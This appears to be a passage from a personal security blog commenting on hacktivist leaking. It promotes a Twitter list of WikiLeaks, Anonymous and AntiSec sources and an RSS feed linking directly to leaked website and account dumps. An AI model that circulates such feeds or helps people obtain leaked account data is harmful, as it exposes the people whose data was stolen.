fourth, rebelling kids used to throw stones, occupy buildings and wear strange provocative clothes. Now they look like any other kid and hack military and police networks and leak the stuff. This means that defacing is passé, leaking is cool if you want to make a name or an impact. Oh yes, you can arrest 10, 100 or 1000, but there will always be some kid somewhere who will find it cool to be in control and will be waging a cyberbattle with the forces 'above him', feeling liberated, excited and important (for once) and loving every second of it.

fifth, you'd better adapt to this new environment (and you will probably have to double your investment in security for the time being, but your ROI will be immediate)

and yes, there is always a big chance that you will be found when enough resources are thrown exclusively at it because you are becoming too much of an embarrassment or danger.

and I agree, the biggest danger is not the hacker, but the lack of complete security because even if there is no active hacker now attacking your network, there will always be someone else for whatever reason who will abuse it.


twitterlist following wikileaks-anonymous-antisec updated with new sources

this Twitter list is unique because you will find the different components of the movement in the same list

* wikileaks - the cables, assange etc

* antisec - Lulzsec (and now freetopiary) and the actions around this (70 websites of police agencies were taken down in a few hours alone)

* the protest movements that inspire (social, political,....)

* the legal anonymous actions and papers

* the hackers around it doing their stuff

You will also find

* the antisec hackers and provocateurs

 

and this

* from countries around the world

* in different languages

 

so yes, it can seem confusing but I think it is one of the most complete lists around

and there is an hourly tweeted 'times' with the best articles of that hour

there are also a lot of other lists to look at

you can follow me, but don't forget to follow or keep a watch on one or many other lists

ps one has new proxies all the time, another has new books or freeware all the time, another exploits etc....

http://www.twitter.com/mailforlen


new feed for leaked files and dumpz of websites and accounts (already 300 links)

this is the feed

http://www.diigo.com/list/Mailforlen/leaks/rss.xml

It has the dumpz and accounts that are found in paste-sites or that are announced

these are links to the downloads not articles about the downloads

these are also not the diplomatic cables and the wikileaks stuff

it will be updated daily or weekly, depending on my time and family health

the links are not checked (I make them to be sure I don't go back to them)

more stuff to come this evening
